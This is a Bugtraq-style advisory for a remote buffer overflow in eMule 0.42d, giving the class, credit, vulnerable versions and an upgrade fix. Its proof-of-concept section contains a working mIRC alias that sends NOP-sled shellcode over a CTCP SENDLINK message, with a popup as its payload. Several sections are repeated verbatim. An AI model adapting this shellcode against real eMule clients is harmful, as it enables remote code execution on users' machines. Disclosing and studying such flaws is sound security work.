eMule Remote Buffer Overflow Vulnerability
BID:10039
Info
eMule Remote Buffer Overflow Vulnerability
| Bugtraq ID: | 10039 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 03 2004 12:00AM |
| Updated: | Apr 03 2004 12:00AM |
| Credit: | Disclosure of this issue is credited to Kostya Kortchinsky <[email protected]>. |
| Vulnerable: |
Emule Emule 0.42 d |
| Not Vulnerable: |
Emule Emule 0.42 e |
Discussion
eMule Remote Buffer Overflow Vulnerability
eMule is prone to a remote buffer overflow vulnerability. This issue is due to a failure of the application to properly validate buffer boundaries during memory copy operations.
Successful exploitation would immediately produce a denial of service condition in the affected process. This issue may also be leveraged to execute code on the affected system within the security context of the user running the vulnerable process.
eMule is prone to a remote buffer overflow vulnerability. This issue is due to a failure of the application to properly validate buffer boundaries during memory copy operations.
Successful exploitation would immediately produce a denial of service condition in the affected process. This issue may also be leveraged to execute code on the affected system within the security context of the user running the vulnerable process.
Exploit / POC
eMule Remote Buffer Overflow Vulnerability
The following proof of concept has been provided:
Note that 'Bourriquet' is a mIRC alias. This proof of concept presents a popup window stating 'Patch your eMule !'.
/bourriquet { .quote PRIVMSG $1 $+(:,$chr(1),SENDLINK|,90909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090EB0790907AF65700906681EC400031C96820210000684D756C656875722065686820796F685061746389E2515152513EFF15C0E76100503EFF1568E461009090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090,|,$chr(1))
The following proof of concept has been provided:
Note that 'Bourriquet' is a mIRC alias. This proof of concept presents a popup window stating 'Patch your eMule !'.
/bourriquet { .quote PRIVMSG $1 $+(:,$chr(1),SENDLINK|,90909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090EB0790907AF65700906681EC400031C96820210000684D756C656875722065686820796F685061746389E2515152513EFF15C0E76100503EFF1568E461009090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090,|,$chr(1))
Solution / Fix
eMule Remote Buffer Overflow Vulnerability
Solution:
The vendor has released an upgrade dealing with this issue.
Emule Emule 0.42 d
Solution:
The vendor has released an upgrade dealing with this issue.
Emule Emule 0.42 d
-
Emule eMule0.42e-Installer.exe
http://umn.dl.sourceforge.net/sourceforge/emule/eMule0.42e-Installer.e xe
References
eMule Remote Buffer Overflow Vulnerability
References:
References:
- eMule Homepage (eMule)
- eMule v0.42d Buffer Overflow (Kostya Kortchinsky
)